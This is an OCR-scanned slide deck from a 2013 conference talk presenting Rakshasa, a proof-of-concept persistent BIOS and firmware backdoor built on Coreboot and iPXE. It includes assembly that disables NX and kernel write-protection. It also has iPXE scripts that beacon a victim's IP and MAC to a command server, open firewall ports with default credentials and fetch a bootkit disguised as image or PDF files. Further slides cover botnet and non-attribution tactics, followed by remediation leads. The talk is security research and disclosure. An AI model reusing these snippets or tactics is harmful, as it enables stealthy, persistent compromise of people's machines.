Hardware Backdooring is practical 



Jonathan Brossard (jb@afq.com.au) 



X\ ^ •"' v * 


1 m\ 

^H A |™^\ Information 
^H #%^^^^ Security 


I^P^scertI 


23/05/2013 



DISCLAIMER 



We are not « terrorists ». We won't release our PoC 
backdoor. 

The x86 architecture is plagued by legacy. 
Governments know. The rest of the industry : not so 
much. 

There is a need to discuss the problems in 
order to find solutions... 



This is belived to be order of 
magnitudes better over existing 
backdoors/malware 



PARENTAL 




Who am I ? 
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Security Researcher 

First learned asm (-15 years ago) 

Presented at Blackhat/Defcon/CCC/HITB/Ruxcon... 

Master in Engineering, master in Computer Sciences 

Co organiser of the NoSuchCon conference (Paris) 



What do I do ? 
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Binary due diligence 

Red teaming 

Research : patents, products etc. 



Agenda 

• Motivation : state level backdooring ? 

• Coreboot & x86 architecture 

• State of the art in rootkitting, romkitting 

• Introducing Rakshasa 

• Rakshasa design 

• Why cryptography (Truecrypt/Bitlocker/TPM) 
won't save us... 

• Backdooring like a nation stateTkakeloduction 



FUD101 
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Could a state (eg : China) backdoor 
all new computers on earth ? 

Occupying the Information High 

Ground: 

Chinese Capabilities for Computer 

Network Operations and 

Cyber Espionage 

This close relationship between some of China's— and the world's— largest 
telecommunications hardware manufacturers creates a potential vector for state sponsored 
or state directed penetrations of the supply chains for microelectronics supporting U.S. 
military, civilian government, and high value civilian industry such as defense and 
telecommunications, though no evidence for such a connection is publicly available. 

Prepared for the U.S.-China Economic and 
Security Review Commission 
by Northrop Grumman Corp 






Bryan Krekel 
Patton Adams 
George Bakos 

March?, 2012 

NORTHROP GRUMMAN 



More FUD 
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Cyberdefense : les routeurs chinois accuses 
d'etre un risque 

Julien L - publie le Jeudi 19 Juillet 2012 a 16h09 - poste dans SociStS 2.0 

*Tw«rt @ g^lj 2 © £» I 

R Chine, Reseau, Windows, ZTE, Huawei 



Partager 13355 

22 commentaire(s; 



Faudra-t-il se passer des equipements chinois dans le secfeur des telecommunications ? Un 
rapport senatorial dedie a la cyberdefense avance cette idee, pointant du doigt les liens entre 
les industriels ZTE et Huawei et le pouvoir central chinois. Mais en matiere de cyberdefense, 
les materiels en provenance de I'Empire du Milieu ne sont pas les seuls a poser question. 

Les equipements de reseau chinois, un risque pour la 
cyberdefense ? C'est ce qui ressort d'un rapport 
senatorial conduit par Jean-Marie Bockel et 
disponible sur le site de la chambre haute du 
parlement. Si le document liste dix priorites et 
propose cinquante recommandations, I'une des 
pistes avancees par le senateur socialiste a 
particulierement surpris. 

Cette priorite, la dixieme, propose "d'interdire sur le 
territoire national et a I'echetle europeenne le 
deploiement et /'utilisation de 'routeurs' ou d'autres 
equipements de coeur de reseaux qui presentent un 
risque pour la securite nationale, en particulier les 
'routeurs' et certains equipements d'origine 




Enough FUD... 
A bit of x86 architecture 



4 




Information 
Security 





FSB 



PCIe «=- 



Northbridge 



-> PCIe 



-> PCIe 
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Floppy 
Keyboards 



Southbridge 
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» Mouse 
> SPI 



State of the art, previous work 
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Previous work 

• Early 80s : Brain virus, targets the MBR 

• 80s, 90s : thousands of such viruses 

• 2007, John Heasman (NGS Software) Blackhat US: 
backdoor EFI bootloader 

• 2009, Anibal Saco and Alfredo Ortega (Core security), 
CanSecWest : patch/flash a Pheonix-Award Bios 

• 2009, Kleissner, Blackhat US : Stoned bootkit. Bootkit 
Windows, Truecrypt. Load arbitrary unsigned kernel 
module. 

• 2010, Kumar and Kumar (HITB Malaysia) : vbootkit 
bootkitting of Windows 7. 

• Piotr Bania, Konboot : bootkit any Windows (32/64b) 

• 2012: Snare (Blackhat 2012): UEFI rootkitting 



Introducing Rakshasa 
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Goals : create the perfect backdoor 

• Persistant 

• Stealth (0 hostile code on the machine) 

• Portable (OS independant) 

• Remote access, remote updates 

• State level quality : plausible deniability, non 
attribution 

• Cross network perimeters (firewalls, auth proxy) 

• Redundancy 

• Non detectable by AV (goes without saying...) 



Rakshasa : Design (1/2) 



• Core components : 

- Coreboot 

- SeaBios 
-iPXE 

- payloads 

Built on top of free software : portability, non 
attribution, cheap dev (~4 weeks of work), really really 
really hard to detect as malicious . 

* Supports 230 motherboards. 



Rakshasa : Design (2/2) 



Flash the BIOS (Coreboot + PCI roms such as iPXE) 

Flash the network card or any other PCI device 
(redundancy) 

Boot a payload over the network (bootkit over https) 

— ► Boot a payload over wifi/wimax (breach the network 
perimeter, bypasses network detection, l(P|D)S ) 

-*• Remotely reflash the BIOS/network card if 
necessary 



Rakshasa architecture (1/2) 



MMwarej fetched at boot 
time, only stored in RAM 




Contained 
in the BIOS 
firware of 
Rakshasa 



Rakshasa architecture (2/2) 



iPXE 




Fetched over the internet 
(if possible using 
wifi/wimax, else : 



etheinet), over HTTPS 



DEMO : Evil remote carnal pwnage 

(of death) 



I jfccan write blogs too... Muhahahaha... 
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Rakshasa : embedded features 



Remove NX bit —> executable heap/stack. 

Make every mapping +W in ringO 

Remove CPU updates (microcodes) 

Remove anti-SMM protections —> generic local root exploit 

Disable ASLR 

Bootkitting (modified Kon-boot payload*) 

* Thanks to Piotr Bania for his contribution to 
Rakshasa :) 



Rakshasa : removing the NX bit (1/2) 

MSR !!! Model Specific Register 



AMD64 Architecture Programmer's manual (volume 2, 
Section 3.1.7 : Extended Feature Enable Register) : 



No-Execute Enable (NXE) Bit. Bit 1 1, read/write. Setting 

this bit to 1 enables the no-execute page- 
protection feature. The feature is disabled when this bit is 

cleared to 0. 



Rakshasa : removing the NX bit (2/2) 



; Disable NX bit (if supported) 

mov eax,0x80000000 
cpuid 

cmp eax,0x80000001 
jb nonsupported 

mov eax,0x80000001 
cpuid 

bt edx,20 

jnc nonsupported 



; get higher function supported by eax 

; need amd K6 or better (anything >= 1997... should be ok) 



; need at least function 0x80000001 
; get Processor Info and Feature Bits 



; NX bit is supported ? 



mov ecx, 0xc0000080 

rdmsr 

btr eax, 1 1 

wrmsr 



; extended feature register (EFER) 

; read MSR 

; disable NX (EFER_NX) // btr = bit test and reset 

; write MSR 



nonsupported: 



Make every mapping +W in ringO 



Intel Manuals (Volume 3A, Section 2.5): 



Write Protect (bit 16 of CRO) - When set, inhibits supervisor- 
level procedures from writing into read-only pages; when clear, 
allows supervisor-level procedures to write into read-only pages 
(regardless of the U/S bit setting; see Section 4.1.3 and Section 
4.6). This flag facilitates implementation of the copy-on-write 
method of creating a new process (forking) used by operating 
systems such as UNIX. 



Make every mapping +W in ringO 

(32b/64b) 



; 32b version : 
mov eax,crO 
and eax,Oxfffeffff 
mov crO.eax 

; 64b version : 
mov rax.crO 
and rax.Oxfffeffff 
mov crO,rax 



Remove CPU updates (microcodes) 



rm -rf Vcoreboot/microcodes/ 



Remove anti-SMM protections (1/2) 



Intel® 82845G/82845GL/82845GV Graphics and Memory Controller datasheets, Section 3.5.1.22: S MR AM— System 
Management RAM Control Register (Device 0), bit 4 : 



SMM Space Locked (D_LCK)—R/W, L When D_LCK is set to 1, D_OPEN is reset to 0; D_LCK, 

D_OPEN, C_BASE_SEG, H_SMRAM_EN, TSEG_SZ and TSEG_EN become read only. D_LCK 

can be set to 1 via a normal configuration space write but can only be cleared by a Full Reset. The 

combination of DLCK and DOPEN provide convenience with security. The BIOS can use the 

DOPEN function to initialize SMM space and then use DLCK to "lock down" SMM space in the 

future so that no application software (or BIOS itself) can violate the integrity of SMM space, even if 

the program has knowledge of the DOPEN function. 



Remove anti-SMM protections (2/2) 

D_LCK is not supported by CoreBoot currently anyway... 

; disable D_LCK shellcode for Coreboot... 
nop 



Disable ASLR 

05 dependant. 

Seed for full ASLR has to be in kernel land 
(equivalent of execve()). 

-» patch the seed with a known value 

Seed location for Windows 7 identified by Kumar 

6 Kumar (HUB KL 2010). 

-► Mapping is 100% repeatable :) 



Rakshasa : embedded features : 
conclusion 



Permantent lowering of the security level on any OS . 

Welcome back to the security level of 1997. 
Persistant, even if HP or OS is remove/restored . 



Rakshasa : remote payload 



Currently capable of Bootkitting any version of 
Windows (32b/64b) thanks to special version of 
Kon-boot 

Bootkit future Oses ? — ► Update/remove/reflash 
firmwares (PCI, BIOS) 



Rakshasa : stealthness 

• We don't touch the disk. evidence on the filesystem. 

• The code flashed to motherboard is not hostile per si 
(there is one text file with urls in it., that's it). 

• We can remotely boot from an alternate payload or 
even OS : fake Truecrypt/Bitlocker prompt ! 

• Optionally boot from a WIFI/WMAX stack : network 
evidence on the LAN. 

• Fake BIOS menus if necessary. We use an embedded 
CMOS image. We can use the real CMOS nvram to 
store encryption keys/backdoor states between 
reboots. 



Rakshasa : why using Coreboot/SeaBios/iPXE is 
the good approach 



Portability : benefit from all the gory reverse 
engineering work already done ! 

Awesome modularity : embbed existing payloads (as 
floppy or cdrom images) and PCI roms directly in the 
main Coreboot rom ! 

Eg : bruteforce bootloaders (Brossard, H2HC 2010), 
bootkits without modification. 

Network stacks : ip/udp/tcp, dns, http(s), tftp, ftp... 
make your own (tcp over dns? Over ntp ?) 

Code is legit : can't be flagged as malware ! 



DEMOS 
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Exemple iPXE configuration files 

get an IP 

#!ipxe 



# try dhcp first, else use static IP 

dhcp ||( set netO/ip 192.168.0.3 && set 
netO/netmask 255.255.255.0 && set 
netO/gateway 192.168.0.1) 



Exemple iPXE configuration files 
fun with webapps... 



# evil pingback to C & C internet blog with HTTP auth... 

kernel http://admin:p4ssw0rd@2012.hackitoergosum.org/xmlrpc.php?ip=$ 
{netO/ip}&mac=${netO/mac}&netmask=${netO/netmask}&gateway=$ 
{netO/gateway}&dns=${netO/dns}&domain=${netO/domain} || 

# Send an email using open relay web application 

kernel http://vulnerablehost.com/vulnservice. asp?mail-from=Rakshasa&mail- 
toaddress=endrazine%40gmail.com&mail-subject=BIOS%20Owned || 

# Rooter pharming : modify firewall settings 

kernel http://admin:password@201 2. hackitoergosum.org/cgi-bin/firewall? 
action=enable&port=all || 

kernel http://root:root@2012.hackitoergosum.org/cgi-bin/firewall?enableport=all 



Exemple iPXE configuration files : 
chain configuration loader from the 

web 

#chain loader over https 

chain https://www.pmcma.org/ads/love.jpg?ip=$ 
{netO/ip}&mac=${netO/mac} || 



Exemple iPXE configuration files : 
boot an alternate OS/bootkit 

# discard everything done so far 
imgfree 

# fetch memdisk kernel over the internet via ftp 
kernel ftp://ftp.pmcma.org/pwnage/memdisk.pdf || 

# fetch bootkit payload over the internet via http 

initrd http://www.pmcma.org/wp-content/uploads/201 2/07/bootkit.pdf 

#boot 
boot 



More demos 





So you guys are evil after all ? 


1 4\\ 

^H £^ W^£ m % Information 
^H #%^™W% Security 


j^pAJSCERTI 



Apache logs 



jonathan@blackbox: 



Pro 



Fichier Edition Affichage Rechercher Terminal Aide 



bash-4.2# tall -n 4 /var/log/apache2/access.log 
10.239.173,250 - - [28/Jul/2012:22:39:17 +1000] 'GET /ads/love 
mac=52%3A54%3A0Oft3A12ft3A34ft3A56&netmask=255 , 255 , 255 , 0&gateway= 
2.3&domaln= HTTP/1,1" 200 1637 "-" "Mozllla/6.0 (Macintosh; I; 
_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Flref ox/10. 0a4" 
10,239.173,250 - - [28/Jul/2012:22:40:26 +1000] "GET /ads/love 
nac=52%3A54%3A00ft3A12ft3A34ft3A56&netmask=255 , 255 , 255 . 0&gateway= 
2,3&domaln= HTTP/1. 1" 200 1624 "-" "Mozllla/6.0 (Macintosh; I; 
_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Flref ox/10. 0a4" 
10,239,173,250 - - [28/Jul/2012:22:42:08 +1000] 'GET /ads/love 
nac=52ft3A54ft3A00ft3A12ft3A34ft3A56&netmask=255 , 255 , 255 , 0&gateway= 
2.3&domaln= HTTP/1. 1" 200 1632 "-" "Mozllla/6.0 (Macintosh; I; 
_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Flref ox/10. 0a4" 
10,239,173,250 - - [28/Jul/2012:22:44:30 +1000] 'GET /ads/love 
mac=52%3A54%3A00ft3A12ft3A34ft3A56&netmask=255 , 255 , 255 , 0&gateway= 
2,3&domaln= HTTP/1.1" 200 1621 "-" "Mozllla/6.0 (Macintosh; I; 
_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Flref ox/10. 0a4" 
bash-4.2# 



.jpg?lp=10,0,2,15& 

lO.0.2.2&dns=lO.O. 

Intel Mac OS X 11 

. jpg?lp=10.0.2,15& 

10.0.2.2&dns=ie.0. 

Intel Mac OS X 11 

. jpg?lp=10,0.2.15& 

10.0.2.2&dns=ie.e. 

Intel Mac OS X 11 



.jpg?ip=10,0,2,15& 

10.0.2.2&dns=10.O. 

Intel Mac OS X 11 



BIOS email pingback 



1 _■: . :- : '-' - - _■- 

^ Wtite Q Address Book o Ta 9 T L ;r Dechiffrer 



t | | & | Subject 



E2 comp.security.fi rewall: 
E2comp.security.misc 
Epcomp.security.ssh 
E2comp.security.unix 



Rakshasa Pingback Defcon Demo 




l^ reply | ^ . .1 forward | j, archive) junk | 9 delete) 



Attn 

Please register me as a member of the< 

ip: 10. G. 2. 15 
mac: 52:54:00:12:34:56 
netmask: 255.255.255.0 
gateway: 10.0.2.2 
dns: 10.0.2.3 



Remote Carnal Pwnage of death 



How to properly build a botnet ? 

• HTTPS + assymetric cryptography (client side certificates, 
signed updates) 

If Microsoft can do secure remote updates, so can a 
malware ! 

• Avoid DNS take overs by law enforcement agencies by 
directing the C&C rotatively on innocent web sites (are you 
gonna shut down Google.com?), use assymetric crypto to 
push updates. 



• So you own my C&C for 1 hour ? You can't do anything 
with it !! 



C&C CANT BE SHUT DOWN OR TAKEN OVER. 



Why crypto won't save you... 
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Why crypto won't save you (1/2) 

We can fake the bootking/password prompt by 
booting a remote OS (Truecrypt/Bitlocker) 

Once we know the password, the BIOS 
backdoor can emulate keyboard typing in 16b 
real mode by programming the 
keyboard/motherboard PIC microcontrolers 
(Brossard, Defcon 2008) 

If necessary, patch back original 
BlOS/firmwares remotely. 



Why crypto won't save you (2/2) 

TPM + full disk encryption won't save you either : 

1 ) It's a passive chip : if the backdoor doesn't 
want explicit access to data on the HD, it can 
simply ignore TPM. 

2) Your HD is never encrypted when delivered 
to you. You seal the TPM when you encrypt 
your HD only. So TPM doesn't prevent 
backdooring from anyone in the supply chain. 



Software implementations of TPM 
are broken anyway 



NoSuchCon 2013 : John Butterworth, Corey 
Kallenberg, Xeno Kovah - BIOS Chronomancy 



Remediation 
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Remediation (leads) 

Flash any firmware uppon reception of new hardware with 
open source software you can verify. 

Perform checksums of all firmwares by physically 
extracting them (FPGA..) : costly ! 

Verify the integrity of all firmwares from time to time 

Update forensics best practices : 

1) Include firmwares in SoW 

2) Throw away your computer in case of intrusion 

Even then... not entirely satisfying : the backdoor can flash 
the original firmwares back remotely. 



Post intrusion recovery 

You can't trust your BIOS 

-» you can't flash from the OS or even 
floppy/cdrom. 

-» need physical flasher. 

Rakshasa can reinfect itself from any PCI 
expension ROM. 

-» you need to flash all the firmwares of the 
motherboards at the same time. 



Exemple of flasher : BIOS Savior 





Backdooring like NSA China 
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Backdooring like a nation state 

Rule #1 : non attribution 

- you didn't write the free software in first place. 

- add a few misleading strings, eg : in mandarin ;) 

Rule #2 : plausible deniability 

- use a bootstrap known remote vulnerability in a 
network card firmware 

(eg : Duflot's CVE-2010-0104) 

— > « honest mistake » if discovered. 

- remotely flash the BIOS. 

- do your evil thing. 

- restore the BIOS remotely. 
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Outro 



This is not a vulnerability : 

- it is sheer bad design due to legacy. 

- don't expect a patch . 

- fixing those issues will probably require breaking 

backward compatibility with most standards 
(PCI, PCIe, TPM). 



Whitepaper/slides 



http://slideshare.net/endrazine 



Twitter : @endrazine 



Questions ? 



4 




A oC -R" 



Information 
Security 



